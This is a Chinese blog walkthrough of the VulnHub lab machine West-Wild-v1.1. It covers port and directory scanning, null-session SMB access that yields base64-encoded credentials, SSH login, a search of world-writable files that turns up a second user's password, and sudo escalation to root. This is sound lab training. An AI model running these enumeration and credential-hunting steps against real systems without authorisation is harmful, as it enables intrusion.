West-Wild-v1.1靶机渗透测试

于 2024-08-11 20:47:36 发布
阅读量94 收藏 4
点赞数 2
文章标签: web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_58786230/article/details/141111532
版权

一、靶机下载地址

https://www.vulnhub.com/entry/westwild-11,338/

二、信息收集

1、靶机给出IP地址

2、端口扫描

# 使用命令
nmap 192.168.145.207 -p- -sV

3、指纹识别

# 使用命令
whatweb 192.168.145.207

4、目录扫描

# 使用命令
dirsearch -u  "http://192.168.145.207"

三、获取shell

1、访问靶机IP地址

2、80端口没什么发现,从139和445这两个smb服务入手,枚举用户、查找共享文件夹,这里看到有一个 wave 共享,访问一下,需要密码,扫描结果中有很多显示空密码,空密码连接成功

# 使用命令
enum4linux 192.168.145.207

smbclient //192.168.145.207/wave

3、查看当前目录下文件,看到一个 flag.txt ,下载下来查看,得到一串加密字符

# 使用命令 
cat FLAG1.txt

RmxhZzF7V2VsY29tZV9UMF9USEUtVzNTVC1XMUxELUIwcmRlcn0KdXNlcjp3YXZleApwYXNzd29yZDpkb29yK29wZW4K

4、base64解码,得到 flag 1 ,以及一个账号密码

user:wavex
password:door+open

5、使用ssh进行连接,连接成功

# 使用命令
ssh wavex@192.168.145.207

四、提权

1、查看当前权限,发现suid、sudo等都没有可利用的

# 使用命令
sudo -l

find / -user root -perm -4000 -print 2>/dev/null

2、在home目录下看到还有一个用户 aveng

# 使用命令
cd /home

3、两个用户目录找了找,没看到啥东西,也没有计划任务,passwd没有写入权限,查看有没有可写文件

# 使用命令
find  / -perm 0777 -type f 2>/dev/null

4、查看文件内容,得到 aveng 用户的密码

# 使用命令
cat /usr/share/av/westsidesecret/ififoregt.sh

aveng:kaizen+80

5、切换用户到 aveng

# 使用命令
su aveng

6、查看当前权限

# 使用命令
sudo -l

7、显示为 all ,直接 sudo su 提权,提权成功

果冻*果冻*
关注
  • 2
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
vulnhub靶机West-Wild-v1.1渗透笔记
liver100day的博客
05-19 484
West-Wild-v1.1靶机渗透 靶机环境搭建: 攻击渗透机: kali IP地址:192.168.75.128 靶机West-Wild-v1.
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
靶机渗透之West-Wild-v1.1
weixin_64267091的博客
12-22 866
首先还是信息收集,先找到主机ip,然后进行端口扫描,看看有哪些端口开放,并且看看有哪些服务。后续渗透攻击会根据开放端口及其服务采取攻击方式。例如在这个靶机中有SMB服务,所以后续就根据这个找到了用户名及密码,最后才提权成功。所以信息收集很重要,以前我只看http服务,就忽略了其他的服务,也因为刚刚接触,所以经验也不足,只能慢慢摸索,所以在这个靶机渗透的过程中我也知道了要学会利用那些服务进行渗透攻击。其次就是漏洞扫描,如果能扫出一些平常的漏洞,那我们就有攻击的方向,也能很快完成攻击过程。
vulnhub靶场,West-Wild-v1.1
kukudeshuo的博客
07-19 486
vulnhub靶场,West-Wild-v1.1 环境准备 靶机下载地址:https://www.vulnhub.com/entry/westwild-11,338/ 攻击机:kali(192.168.58.130) 靶机West-Wild-v1.1(192.168.58.158) 下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式 信息收集 使用arp-scan确定目标靶机 确定目标靶机IP为192.168.58.158 使用nmap扫
vulnhub靶机 West-Wild-v1.1(渗透测试详解)
最新发布
2301_78721909的博客
08-11 219
vulnhub靶机 West-Wild-v1.1(渗透测试详解)
West-Wild-v1.1--靶机实操讲解
qq_61802750的博客
08-02 384
22是open SSH 服务,6.6.1版本,这个端口有漏洞的概率极小,优先级排后。tcp 扫出的四个端口,在tcp协议下都可以进行渗透测试,如果涉及到一些异常情况,或者需要找一些新的信息的时候,也可能涉及到udp。这样smb服务的两个端口就利用完毕了,我们还有22和80端口,22端口的ssh服务排后,先看80端口的web服务,显示3个smb的共享信息,但是只有wave可以访问,我们尝试进行连接。发现有/etc/passwd,我们看一下对passwd的权限。我们直接切换用户,进行用户间的横向移动。
Vulnhub_WestWild1.1靶机渗透测试
m0_66225311的博客
09-20 120
该靶场主要学习到了就是使用Samba查看共享文件,使用sabmap和sabclient对samba服务的利用。没想到的一点就是用户横向移动查找另一个用户账号密码文件的方式,直接查找了当前用户可写权限的·文件,找到了存储账号密码的一个脚本。该用户具有root的全部权限 直接sudo /bin/bash获取root的shell。
WestWild 1.1 靶机
weixin_62162207的博客
07-29 279
West Wild v1 1是一个入门级的CTF系列,由Hashim创建。该CTF系列是为那些具有渗透测试工具和技术基础知识的人准备的。
[VulnHub靶机渗透] WestWild 1.1
人若无名,便可专心练剑
02-03 2734
Vulnhub 是一个提供虚拟机靶场的平台,用于进行网络安全渗透测试的练习。在 Vulnhub 上,你可以下载虚拟机映像并在你自己的环境中进行攻击和防御的实践。
DC-4-Web渗透测试靶机
01-19
【DC-4-Web渗透测试靶机】是一个专门为网络安全专业人士设计的模拟环境,主要用于学习和实践Web渗透测试技术。在Web渗透测试中,目标是识别并利用网站应用程序的安全漏洞,以便于预防或修复这些漏洞,保护真实的网络...
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
Vulnhub靶机渗透测试 DC-9靶机
12-07
Vulnhub靶机渗透测试 DC-9靶机
Gartner发布2024年网络风险管理成熟度曲线:使网络安全战略与业务目标保持一致的概念、方法、流程和技术
lurenjia404的博客
08-07 733
网络风险管理现在是高管和监管机构最关注的问题,它采用多种方法和技术来支持治理、风险管理和合规性。安全和风险管理领导者可以使用此技术成熟度曲线来评估解决方案并做出适当的采用决策。
《密码编码学与网络安全原理与实践》第四章第六章第七章 对称加密体制
m0_57291352的博客
08-06 970
对称加密包括分组密码和流密码分组密码:信息被分块(block)进行加密和解密,连续的明文元素使用相同的密钥K来加密,密文C=c1c2…=EK(m1)EK(m2)…C =c_1c_2…=E_K(m_1)E_K(m_2)…C=c1​c2​…=EK​(m1​)EK​(m2​)…。分组密码可以看作是一个字符长度很大代换——如64比特或更多。大部分的分组对称密码都基于Feistel结构。可逆变换是必要条件。设计”安全”的密码算法不难,只要使用足够多的轮数就可以,但降低速度,因此所有问题就是平衡问题。流密码:流密码中按
Web安全学习
荆鹏的博客
08-06 334
应用层:为用户为用户的应用进程提供网络通信服务协议——DNS协议、HTTP协议、HTTPS协议传输层:负责两台主机之间的数据传输,将数据从发送端传输到接收端协议——TCP协议、UDP协议网络层:负责传输的地址管理和路由选择,在众多复杂的网络环境中确定一条合适的路径协议——IP协议数据链路层:负责设备之间数据帧的传送和识别,将网络层传递的数据报封装成帧,在处于同一个数据数据链路节点的两个设备之间传输协议——ARP协议、MTU协议。
蓝屏事件:网络安全的启示
m0_67187271的博客
08-04 1452
这次事件,源于美国电脑安全技术公司“众击”提供的一个带有“缺陷”的软件更新,它如同一颗隐形炸弹,在全球范围内引爆,导致近850万台设备遭遇故障,横跨航空、医疗、传媒等众多关键行业,甚至造成美国超过2.3万架次航班延误,其影响之广令人震惊。该事件突显了在快速迭代的软件更新周期中,充分的测试和评估的重要性。通过强化日志管理、质量管理、风险评估以及灾难恢复计划,结合冗余系统设计和自动化监控工具的应用,我们能够显著提高对类似大规模故障的预防能力和应对速度,为确保系统的稳定性和可靠性奠定坚实的基础。
网络安全应急响应
goodxianping的专栏
08-10 168
n\n由于本人水平有限,文章中可能会出现一些错误,欢迎各位大佬指正,网络安全应急响应定义\n网络安全应急响应是指针对已经发生或可能发生的安全事件进行监控、分析、协调、处理,以保护资产安全。\n\n常见的安全事件\n不同的安全事件类型需要不同的应急方式。以下是一些常见的安全事件类型:\n\nWeb入侵:包括挂马、篡改、Webshell等。\n病毒木马:包括远控、后门、勒索软件、挖矿程序等。\n应急响应需解决的问题\n发生上述安全问题时,我们需要解决以下几个关键问题:\n\n本次事件的影响范围有多大?
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值